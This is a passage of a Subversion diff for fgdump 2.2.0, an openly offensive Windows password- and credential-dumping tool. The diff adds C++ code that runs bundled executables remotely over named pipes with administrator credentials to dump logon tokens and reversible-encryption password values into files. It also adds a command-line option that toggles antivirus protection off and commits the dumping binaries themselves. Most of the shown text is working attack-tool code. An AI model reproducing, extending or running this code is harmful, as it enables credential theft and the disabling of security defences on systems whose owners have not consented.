+		Process p;
+
+		HANDLE hProcess = p.CreateProcess(lpszStopCmdLine, lpszParams);
+		if (hProcess != 0)
+		{
+			DWORD dwResult = WaitForSingleObject(hProcess, 1200000);	// Wait 20 minutes for process to complete
+			if (dwResult != WAIT_OBJECT_0)
+			{
+				Log.CachedReportError(m_nCacheID, CRITICAL, "Warning: RevDump did not complete in a timely manner - exiting");
+				result = false;
+			}
+			else
+			{
+				// Read from process's output
+				char* szResult;
+				int nSize = 65535;
+
+				szResult = new char[nSize];
+				memset(szResult, 0, nSize);
+				p.ReadFromPipe(&szResult, nSize);
+
+				// Was it successful?
+				if (strstr(szResult, "RevDump ") != NULL)
+				{
+					// Success
+					// Write results to a file
+					size_t nLen = strlen(lpszMachine) + 8;		// 8 chars accounts for ".revdump" extension
+					char* szTempFilename = new char[nLen + 1];
+					memset(szTempFilename, 0, nLen + 1);
+					_snprintf(szTempFilename, nLen, "%s.revdump", lpszMachine);
+
+					std::ofstream outputFile(szTempFilename, std::ios::out | std::ios::trunc);
+					outputFile.write((const char*)szResult, (DWORD)strlen(szResult));
+					outputFile.close();
+					delete [] szTempFilename;
+					Log.CachedReportError(m_nCacheID, CRITICAL, "Reversible encryption values dumped successfully\n", lpszMachine);
+					result = true;
+				}
+				else
+				{
+					// Failed
+					Log.CachedReportError(m_nCacheID, CRITICAL, "Failed to dump reversible encryption values (the text returned follows):\n%s", szResult);
+					result = false;
+				}
+
+				delete [] szResult;
+			}
+		}
+		else
+			result = false;
+	}
+	catch(...)
+	{
+		result = false;
+	}
+
+	delete [] lpszStopCmdLine;
+	delete [] lpszParams;
+
+	return result;
+}
+
Index: Main.cpp
===================================================================
--- Main.cpp	(revision 1246)
+++ Main.cpp	(revision 1355)
@@ -24,12 +24,15 @@
 void Usage()
 {
 	printf("Usage:\n");
-	printf("%s [-?][-t][-c][-w][-s][-r][-v][-k][-o][-a][-O 32|64][-l logfile][-T threads] [{{-h Host | -f filename} -u Username -p Password | -H filename}]\n", "fgdump");
+	printf("%s [-?][-t][-e][-c][-w][-x][-y][-s][-r][-v][-k][-o][-a][-O 32|64][-l logfile][-T threads] [{{-h Host | -f filename} -u Username -p Password | -H filename}]\n", "fgdump");
 	printf("\t where Username and Password have administrator credentials\n");
 	printf("\t -? displays help (you're looking at it!)\n");
 	printf("\t -t will test for the presence of antivirus without actually running the password dumps\n");
+	printf("\t -e will toggle antivirus state (e.g. if enabled, then disable) \n");
 	printf("\t -c skips the cache dump\n");
 	printf("\t -w skips the password dump\n");
+	printf("\t -x performs the logon token dump\n");
+	printf("\t -y performs the reversible encryption value dump\n");
 	printf("\t -s performs the protected storage dump\n");
 	printf("\t -r forgets about existing pwdump/cachedump files. The default behavior is to skip a host if these files already exist.\n");
 	printf("\t -v makes output more verbose. Use twice for greater effect\n");
@@ -52,7 +55,7 @@
 
 	printf("fgDump 2.2.0 - fizzgig and the mighty group at foofus.net\n");
 	printf("*** THIS IS A BETA VERSION, YOU HAVE BEEN WARNED ***\n");
-	printf("Written to make j0m0kun's life just a bit easier\n");
+	printf("Written to make JoMo-Kun's life just a bit easier\n");
 	printf("Copyright(C) 2008 fizzgig and foofus.net\n");
 	printf("fgdump comes with ABSOLUTELY NO WARRANTY!\n");
 	printf("This is free software, and you are welcome to redistribute it\n");
@@ -64,7 +67,7 @@
 		printf("No parameters specified, doing a local dump. Specify -? if you are looking for help.\n");
 	}
 
-	while ((c = getopt(argc, argv, _T("h:tf:H:u:p:l:T:O:cwrvskoa?"))) != EOF)
+	while ((c = getopt(argc, argv, _T("h:tf:H:u:p:l:T:O:cwrvskoaexy?"))) != EOF)
 	{
 		switch(c)
 		{
@@ -77,6 +80,9 @@
 		case 't':
 			fgd.SetTestOnlyAV(true);	// Only check for AV
 			break;
+		case 'e':
+			fgd.SetToggleOnlyAV(true);	// Only toggle AV state
+			break;
 		case 'f':
 			if (strlen(optarg) > MAX_PATH)
 			{
@@ -111,6 +117,12 @@
 		case 'w':
 			fgd.SetSkipPWDump(true);
 			break;
+		case 'x':
+			fgd.SetSkipWhosThere(false);
+			break;
+		case 'y':
+			fgd.SetSkipRevDump(false);
+			break;
 		case 's':
 			fgd.SetSkipProtectedStorageDump(false);
 			break;
Index: fgdump.h
===================================================================
--- fgdump.h	(revision 1246)
+++ fgdump.h	(revision 1355)
@@ -52,21 +52,28 @@
 	char lpszPSServicePath[MAX_PATH + 15];
 	char lpszCacheDumpPath[MAX_PATH + 15];
 	char lpszCacheDump64Path[MAX_PATH + 15];
+	char lpszWhosTherePath[MAX_PATH + 15];
+	char lpszRevDumpPath[MAX_PATH + 15];
 	char lpszPStoragePath[MAX_PATH + 15];
 	char lpszFGExecPath[MAX_PATH + 15];
 	char lpszCacheDumpExeName[MAX_EXE_NAME_LEN + 1];
 	char lpszCacheDump64ExeName[MAX_EXE_NAME_LEN + 1];
+	char lpszWhosThereExeName[MAX_EXE_NAME_LEN + 1];
+	char lpszRevDumpExeName[MAX_EXE_NAME_LEN + 1];
 	char lpszFgExecExeName[MAX_EXE_NAME_LEN + 1];
 
-	bool bFullRun, bRunPwdump, bRunCachedump, bRunPStgDump, bSkipExisting, bContinueOnUnknownAV;
+	bool bFullRun, bRunPwdump, bRunWhosThere, bRunRevDump, bRunCachedump, bRunPStgDump, bSkipExisting, bContinueOnUnknownAV, bToggleAV;
 	bool bSkipPwdumpHistory;
 	bool bRunLocal;
 	bool bSkipAVCheck;
 	int	 nOSBits;
 
 	void SetTestOnlyAV(bool bTestOnly);
+	void SetToggleOnlyAV(bool bToggleOnly);
 	void SetSkipCacheDump(bool bSkip);
 	void SetSkipPWDump(bool bSkip);
+	void SetSkipWhosThere(bool bSkip);
+	void SetSkipRevDump(bool bSkip);
 	void SetSkipProtectedStorageDump(bool bSkip);
 	void SetIgnoreExistingFiles(bool bIgnoreExisting);
 	void SetHostfileName(char* szFile);
Index: HostDumper.h
===================================================================
--- HostDumper.h	(revision 1246)
+++ HostDumper.h	(revision 1355)
@@ -58,6 +58,8 @@
 	bool bRunLocal;
 
 	bool RunCacheDump(char* lpszTempPath, bool bIs64Bit, char* lpszPipeName = NULL);
+	bool RunWhosThere(char* lpszTempPath, char* lpszPipeName = NULL);
+	bool RunRevDump(char* lpszTempPath, char* lpszPipeName = NULL);
 	bool RunProtectedStorageDump(char* lpszTempPath, char* lpszUser, char* lpszPassword, char* lpszPipeName);
 	bool StopAndRemoveFGExec(bool* bIsFgexecStillInstalled);
 	bool InstallAndStartFGExec(const char* lpszPipeName, bool* bIsFgexecStillInstalled);
Index: WhosThereControl.h
===================================================================
--- WhosThereControl.h	(revision 0)
+++ WhosThereControl.h	(revision 1355)
@@ -0,0 +1,37 @@
+/******************************************************************************
+fgdump - by fizzgig and the foofus.net group
+Copyright (C) 2009 by JoMo-Kun
+http://www.foofus.net
+
+This program is free software; you can redistribute it and/or
+modify it under the terms of the GNU General Public License
+as published by the Free Software Foundation; either version 2
+of the License, or (at your option) any later version.
+
+This program is distributed in the hope that it will be useful,
+but WITHOUT ANY WARRANTY; without even the implied warranty of
+MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+GNU General Public License for more details.
+
+You should have received a copy of the GNU General Public License
+along with this program; if not, write to the Free Software
+Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.
+******************************************************************************/
+#pragma once
+#ifndef _WHOSTHERECONTROL_H
+#define _WHOSTHERECONTROL_H
+
+class WhosThereControl
+{
+public:
+	WhosThereControl(LONG nCacheID = -1);
+	~WhosThereControl(void);
+
+	bool Execute(const char* lpszPSExecPath, const char* lpszDumpPath, char* lpszMachine, char* lpszExeName, char* lpszPipeName = NULL);
+
+private:
+	LONG m_nCacheID;
+
+};
+
+#endif
\ No newline at end of file
Index: resource.h
===================================================================
--- resource.h	(revision 1246)
+++ resource.h	(revision 1355)
@@ -3,24 +3,21 @@
 // Used by fgdump.rc
 //
 #define IDR_PSTGDUMP                    130
-#define IDR_BIN1                        152
-#define IDR_BIN2                        157
-#define IDR_BIN3                        173
-#define IDR_BIN4                        180
 #define IDR_CACHEDUMP                   181
-#define IDR_BIN6                        182
 #define IDR_CACHEDUMP64                 182
 #define IDR_PWDUMP                      183
-#define IDR_BIN5                        184
 #define IDR_FGEXEC                      184
+#define IDR_WHOSTHERE                   194
+#define IDR_REVDUMP                     195
+#define IDR_BIN1                        199
 
 // Next default values for new objects
 // 
 #ifdef APSTUDIO_INVOKED
 #ifndef APSTUDIO_READONLY_SYMBOLS
-#define _APS_NEXT_RESOURCE_VALUE        185
+#define _APS_NEXT_RESOURCE_VALUE        200
 #define _APS_NEXT_COMMAND_VALUE         40001
 #define _APS_NEXT_CONTROL_VALUE         1001
-#define _APS_NEXT_SYMED_VALUE           101
+#define _APS_NEXT_SYMED_VALUE           103
 #endif
 #endif
Index: Release/fgdump.exe
===================================================================
Cannot display: file marked as a binary type.
svn:mime-type = application/octet-stream
Index: Debug/fgdump.exe
===================================================================
Cannot display: file marked as a binary type.
svn:mime-type = application/octet-stream
Index: whosthere.exe
===================================================================
Cannot display: file marked as a binary type.
svn:mime-type = application/octet-stream

Property changes on: whosthere.exe
___________________________________________________________________
Added: svn:mime-type
   + application/octet-stream

Index: WhosThereControl.cpp
===================================================================
--- WhosThereControl.cpp	(revision 0)
+++ WhosThereControl.cpp	(revision 1355)
@@ -0,0 +1,136 @@
+/******************************************************************************
+fgdump - by fizzgig and the foofus.net group
+Copyright (C) 2009 by JoMo-Kun
+http://www.foofus.net
+
+This program is free software; you can redistribute it and/or
+modify it under the terms of the GNU General Public License
+as published by the Free Software Foundation; either version 2
+of the License, or (at your option) any later version.
+
+This program is distributed in the hope that it will be useful,
+but WITHOUT ANY WARRANTY; without even the implied warranty of
+MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+GNU General Public License for more details.
+
+You should have received a copy of the GNU General Public License
+along with this program; if not, write to the Free Software
+Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.
+******************************************************************************/
+#include "StdAfx.h"
+#include "WhosThereControl.h"
+#include "Process.h"
+
+WhosThereControl::WhosThereControl(LONG nCacheID)
+{
+	m_nCacheID = nCacheID;
+}
+
+
+WhosThereControl::~WhosThereControl(void)
+{
+
+}
+
+bool WhosThereControl::Execute(const char* lpszPSExecPath, const char* lpszDumpPath, char* lpszMachine, char* lpszExeName, char* lpszPipeName)
+{
+	char* lpszCmdLineFormat;
+	int nArgSize;
+	char* lpszStopCmdLine;
+	char* lpszParams;
+	bool result = false;
+	
+	if (lpszPipeName == NULL)
+	{
+		// Set the local WhosThere path
+		lpszCmdLineFormat = "%s\\%s";
+		nArgSize = _scprintf(lpszCmdLineFormat, lpszDumpPath, lpszExeName);
+		lpszStopCmdLine = new char[nArgSize + 1];
+		memset(lpszStopCmdLine, 0, nArgSize + 1);
+		_snprintf(lpszStopCmdLine, nArgSize, lpszCmdLineFormat, lpszDumpPath, lpszExeName);
+
+		// Now set the parameters
+		lpszCmdLineFormat = " -l";
+		nArgSize = strlen(lpszCmdLineFormat);
+		lpszParams = new char[nArgSize + 1];
+		memset(lpszParams, 0, nArgSize + 1);
+		_snprintf(lpszParams, nArgSize, lpszCmdLineFormat);
+	}
+	else
+	{
+		lpszStopCmdLine = new char[strlen(lpszPSExecPath) + 1];
+		memset(lpszStopCmdLine, 0, strlen(lpszPSExecPath) + 1);
+		strncpy(lpszStopCmdLine, lpszPSExecPath, strlen(lpszPSExecPath));
+
+		lpszCmdLineFormat = " -c -n %s %s \"%s\\%s \" -l";
+
+		nArgSize = _scprintf(lpszCmdLineFormat, lpszPipeName, lpszMachine, lpszDumpPath, lpszExeName);
+		lpszParams = new char[nArgSize + 1];
+		memset(lpszParams, 0, nArgSize + 1);
+		_snprintf(lpszParams, nArgSize, lpszCmdLineFormat, lpszPipeName, lpszMachine, lpszDumpPath, lpszExeName);
+	}
+
+	try
+	{
+		Process p;
+
+		HANDLE hProcess = p.CreateProcess(lpszStopCmdLine, lpszParams);
+		if (hProcess != 0)
+		{
+			DWORD dwResult = WaitForSingleObject(hProcess, 1200000);	// Wait 20 minutes for process to complete
+			if (dwResult != WAIT_OBJECT_0)
+			{
+				Log.CachedReportError(m_nCacheID, CRITICAL, "Warning: WhosThere did not complete in a timely manner - exiting");
+				result = false;
+			}
+			else
+			{
+				// Read from process's output
+				char* szResult;
+				int nSize = 65535;
+
+				szResult = new char[nSize];
+				memset(szResult, 0, nSize);
+				p.ReadFromPipe(&szResult, nSize);
+
+				// Was it successful?
+				if (strstr(szResult, "the output format is") != NULL)
+				{
+					// Success
+					// Write results to a file
+					size_t nLen = strlen(lpszMachine) + 10;		// 10 chars accounts for ".whosthere" extension
+					char* szTempFilename = new char[nLen + 1];
+					memset(szTempFilename, 0, nLen + 1);
+					_snprintf(szTempFilename, nLen, "%s.whosthere", lpszMachine);
+
+					std::ofstream outputFile(szTempFilename, std::ios::out | std::ios::trunc);
+					outputFile.write((const char*)szResult, (DWORD)strlen(szResult));
+					outputFile.close();
+					delete [] szTempFilename;
+					Log.CachedReportError(m_nCacheID, CRITICAL, "Logon tokens dumped successfully\n", lpszMachine);
+					result = true;
+				}
+				else
+				{
+					// Failed
+					Log.CachedReportError(m_nCacheID, CRITICAL, "Failed to dump logon tokens (the text returned follows):\n%s", szResult);
+					result = false;
+				}
+
+				delete [] szResult;
+			}
+		}
+		else
+			result = false;
+	}
+	catch(...)
+	{
+		result = false;
+	}
+
+	delete [] lpszStopCmdLine;
+	delete [] lpszParams;
+
+	return result;
+}
+
Index: revdump.exe
===================================================================
Cannot display: file marked as a binary type.
svn:mime-type = application/octet-stream

Property changes on: revdump.exe
___________________________________________________________________
Added: svn:mime-type
   + application/octet-stream

